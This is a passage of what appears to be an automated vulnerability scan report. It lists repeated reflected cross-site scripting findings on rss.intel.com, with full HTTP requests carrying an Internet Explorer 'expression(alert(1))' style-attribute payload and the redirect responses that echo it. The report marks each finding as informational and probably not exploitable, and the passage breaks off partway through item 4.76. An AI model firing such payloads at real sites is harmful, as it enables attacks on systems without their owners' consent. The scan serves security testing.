4.63. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 2]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c13a"style%3d"x%3aexpression(alert(1))"dbd34b499c2 was submitted in the REST URL parameter 2. This input was echoed as 3c13a"style="x:expression(alert(1))"dbd34b499c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-2640903c13a"style%3d"x%3aexpression(alert(1))"dbd34b499c2/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:04 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-2640903c13a"style="x:expression(alert(1))"dbd34b499c2
Content-Length: 263
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-2640903c13a"style="x:expression(alert(1))"dbd34b499c2">
...[SNIP]...

4.64. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 3]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 542f9"style%3d"x%3aexpression(alert(1))"6ae2d48504d was submitted in the REST URL parameter 3. This input was echoed as 542f9"style="x:expression(alert(1))"6ae2d48504d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264090/newsroom.intel.com542f9"style%3d"x%3aexpression(alert(1))"6ae2d48504d/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:08 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com542f9"style="x:expression(alert(1))"6ae2d48504d/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign
Content-Length: 238
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com542f9"style="x:expression(alert(1))"6ae2d48504d/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign">
...[SNIP]...

4.65. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 4]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18b87"style%3d"x%3aexpression(alert(1))"1cf80933b02 was submitted in the REST URL parameter 4. This input was echoed as 18b87"style="x:expression(alert(1))"1cf80933b02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264090/newsroom.intel.com/community18b87"style%3d"x%3aexpression(alert(1))"1cf80933b02/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:12 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community18b87"style="x:expression(alert(1))"1cf80933b02/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090
Content-Length: 263
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community18b87"style="x:expression(alert(1))"1cf80933b02/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090">
...[SNIP]...

4.66. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 5]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da64d"style%3d"x%3aexpression(alert(1))"dba1dcf6eaa was submitted in the REST URL parameter 5. This input was echoed as da64d"style="x:expression(alert(1))"dba1dcf6eaa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroomda64d"style%3d"x%3aexpression(alert(1))"dba1dcf6eaa/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:17 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroomda64d"style="x:expression(alert(1))"dba1dcf6eaa/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090
Content-Length: 263
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroomda64d"style="x:expression(alert(1))"dba1dcf6eaa/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090">
...[SNIP]...

4.67. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 6]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5de8"style%3d"x%3aexpression(alert(1))"b9a36043a42 was submitted in the REST URL parameter 6. This input was echoed as c5de8"style="x:expression(alert(1))"b9a36043a42 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blogc5de8"style%3d"x%3aexpression(alert(1))"b9a36043a42/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:23 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blogc5de8"style="x:expression(alert(1))"b9a36043a42/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090
Content-Length: 263
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blogc5de8"style="x:expression(alert(1))"b9a36043a42/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090">
...[SNIP]...

4.68. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 7]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 210fc"style%3d"x%3aexpression(alert(1))"72bb478d645 was submitted in the REST URL parameter 7. This input was echoed as 210fc"style="x:expression(alert(1))"72bb478d645 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011210fc"style%3d"x%3aexpression(alert(1))"72bb478d645/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:27 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011210fc"style="x:expression(alert(1))"72bb478d645/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090
Content-Length: 263
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011210fc"style="x:expression(alert(1))"72bb478d645/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090">
...[SNIP]...

4.69. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 8]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ca69"style%3d"x%3aexpression(alert(1))"d3ef2b7acf6 was submitted in the REST URL parameter 8. This input was echoed as 1ca69"style="x:expression(alert(1))"d3ef2b7acf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/011ca69"style%3d"x%3aexpression(alert(1))"d3ef2b7acf6/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:33 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/011ca69"style="x:expression(alert(1))"d3ef2b7acf6/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090
Content-Length: 263
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/011ca69"style="x:expression(alert(1))"d3ef2b7acf6/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090">
...[SNIP]...

4.70. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 9]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56bbf"style%3d"x%3aexpression(alert(1))"8390e8a9d78 was submitted in the REST URL parameter 9. This input was echoed as 56bbf"style="x:expression(alert(1))"8390e8a9d78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/3156bbf"style%3d"x%3aexpression(alert(1))"8390e8a9d78/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:37 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/3156bbf"style="x:expression(alert(1))"8390e8a9d78/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090
Content-Length: 263
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/3156bbf"style="x:expression(alert(1))"8390e8a9d78/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090">
...[SNIP]...

4.71. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 10]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

Issue detail

The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd2dc"style%3d"x%3aexpression(alert(1))"a09a84ec8e8 was submitted in the REST URL parameter 10. This input was echoed as dd2dc"style="x:expression(alert(1))"a09a84ec8e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-businessdd2dc"style%3d"x%3aexpression(alert(1))"a09a84ec8e8 HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:45 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-businessdd2dc"style="x:expression(alert(1))"a09a84ec8e8?cid=rss-258152-c1-264093
Content-Length: 246
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-businessdd2dc"style="x:expression(alert(1))"a09a84ec8e8?cid=rss-258152-c1-264093">
...[SNIP]...

4.72. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 2]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3d82"style%3d"x%3aexpression(alert(1))"a47bdb4daac was submitted in the REST URL parameter 2. This input was echoed as c3d82"style="x:expression(alert(1))"a47bdb4daac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264093c3d82"style%3d"x%3aexpression(alert(1))"a47bdb4daac/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:04 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093c3d82"style="x:expression(alert(1))"a47bdb4daac
Content-Length: 246
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093c3d82"style="x:expression(alert(1))"a47bdb4daac">
...[SNIP]...

4.73. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 3]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf234"style%3d"x%3aexpression(alert(1))"80af0cefb29 was submitted in the REST URL parameter 3. This input was echoed as bf234"style="x:expression(alert(1))"80af0cefb29 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264093/newsroom.intel.combf234"style%3d"x%3aexpression(alert(1))"80af0cefb29/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:09 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.combf234"style="x:expression(alert(1))"80af0cefb29/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business
Content-Length: 221
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.combf234"style="x:expression(alert(1))"80af0cefb29/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business">
...[SNIP]...

4.74. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 4]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee58f"style%3d"x%3aexpression(alert(1))"9a29b5a08b9 was submitted in the REST URL parameter 4. This input was echoed as ee58f"style="x:expression(alert(1))"9a29b5a08b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264093/newsroom.intel.com/communityee58f"style%3d"x%3aexpression(alert(1))"9a29b5a08b9/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:14 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/communityee58f"style="x:expression(alert(1))"9a29b5a08b9/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093
Content-Length: 246
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/communityee58f"style="x:expression(alert(1))"9a29b5a08b9/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093">
...[SNIP]...

4.75. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 5]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc484"style%3d"x%3aexpression(alert(1))"f99e89de0d0 was submitted in the REST URL parameter 5. This input was echoed as dc484"style="x:expression(alert(1))"f99e89de0d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroomdc484"style%3d"x%3aexpression(alert(1))"f99e89de0d0/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:20 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroomdc484"style="x:expression(alert(1))"f99e89de0d0/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093
Content-Length: 246
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroomdc484"style="x:expression(alert(1))"f99e89de0d0/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093">
...[SNIP]...

4.76. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 6]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

Issue detail

